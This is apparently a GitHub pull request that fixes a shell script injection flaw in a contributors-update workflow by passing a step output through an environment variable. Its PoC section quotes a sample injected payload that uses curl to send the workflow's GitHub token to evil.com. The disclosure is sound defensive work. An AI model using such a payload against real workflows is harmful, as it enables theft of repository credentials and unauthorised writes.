### PR TITLE
fix(workflow): prevent script injection in update_contributors_images

### DIFF
--- a/.github/workflows/update_contributors_images.yml
+++ b/.github/workflows/update_contributors_images.yml
@@ -28,8 +28,10 @@ jobs:
           avatarSize: 42
 
       - name: Modify README.md
+        env:
+          HTML_LIST: ${{ steps.contributors.outputs.htmlList }}
         run: |
-          escapedHtmlList=$(echo -e '${{steps.contributors.outputs.htmlList}}' | sed ':a;N;$!ba;s/\n/\\n/g;s/\\n$//')
+          escapedHtmlList=$(echo -e "$HTML_LIST" | sed ':a;N;$!ba;s/\n/\\n/g;s/\\n$//')
           openDelimiter='<!--AUTO_GENERATED_PLEASE_DONT_DELETE_IT-->'
           closeDelimiter='<!--AUTO_GENERATED_PLEASE_DONT_DELETE_IT-END-->'
           sed -i "/$openDelimiter/,/$closeDelimiter/c\\$openDelimiter$escapedHtmlList$closeDelimiter" README.md


### PR DESCRIPTION
## Summary

This fixes a GitHub Actions script injection vulnerability (CWE-78) in the `update_contributors_images.yml` workflow.

## Vulnerability

In the "Modify README.md" step, the `htmlList` output from the contributors step is interpolated directly into the shell script using `${{ steps.contributors.outputs.htmlList }}`. This is the classic GitHub Actions script injection pattern — the expression is expanded *before* the shell runs, so any shell metacharacters in the data become live shell syntax.

**Affected file:** `.github/workflows/update_contributors_images.yml`, line 31  
**Data flow:** `steps.contributors.outputs.htmlList` → direct `${{ }}` interpolation in `run:` block → shell execution  
**CWE:** [CWE-78 (OS Command Injection)](https://cwe.mitre.org/data/definitions/78.html)

### Impact

The workflow runs with `contents: write` permission and uses a GitHub App token (`${{ secrets.GH_APP_TOKEN }}`). If a contributor's data from the GitHub API contained shell metacharacters, those would be interpreted as shell commands during workflow execution. An attacker who is a contributor to this repository could potentially achieve arbitrary command execution in the workflow runner context, with write access to the repository.

### PoC

The vulnerable line is:

```yaml
run: |
  escapedHtmlList=$(echo -e '${{steps.contributors.outputs.htmlList}}' | sed ...)
```

If `htmlList` contained, for example, `'); curl http://evil.com/steal?t=$(cat $GITHUB_TOKEN) #`, the shell would interpret the injected commands. While GitHub usernames are restricted to alphanumeric characters and hyphens, the output is HTML that includes URLs, alt text, and other fields that could contain unexpected characters, and future changes to the contributor action could widen the attack surface.

To verify this is exploitable in principle, create a test workflow that uses direct `${{ }}` interpolation of an output containing shell metacharacters:

```yaml
- name: Test injection
  run: |
    echo '${{ steps.test.outputs.value }}'
```

If `steps.test.outputs.value` is set to `'; echo INJECTED; echo '`, the `echo INJECTED` command executes.

## Fix

The fix applies [GitHub's recommended mitigation](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable): pass the step output through an environment variable instead of direct interpolation.

```yaml
- name: Modify README.md
  env:
    HTML_LIST: ${{ steps.contributors.outputs.htmlList }}
  run: |
    escapedHtmlList=$(echo -e "$HTML_LIST" | sed ...)
```

This way, the value is set as an environment variable *before* the shell script runs, and `$HTML_LIST` is expanded by the shell as a string — not parsed as shell code.

## Testing

- Verified the diff is minimal (1 file, 3 insertions, 1 deletion) and only touches the affected workflow step.
- Confirmed the fix follows the exact pattern recommended by GitHub's security hardening documentation.
- Reviewed that the `sed` pipeline and downstream logic (`README.md` modification) remain functionally identical — the only change is how the data enters the shell.
- Checked that the environment variable name `HTML_LIST` does not conflict with any existing variables in the workflow.

## Adversarial Review

Before submitting, we considered whether this is practically exploitable: GitHub usernames are alphanumeric with hyphens, which limits direct injection through names. However, the `htmlList` output contains full HTML markup including URLs and attributes, not just usernames. The contributor action could also change its output format in the future. More importantly, the fix is zero-risk and follows GitHub's own security guidance — there's no reason to leave a known-dangerous pattern in place regardless of current exploitability.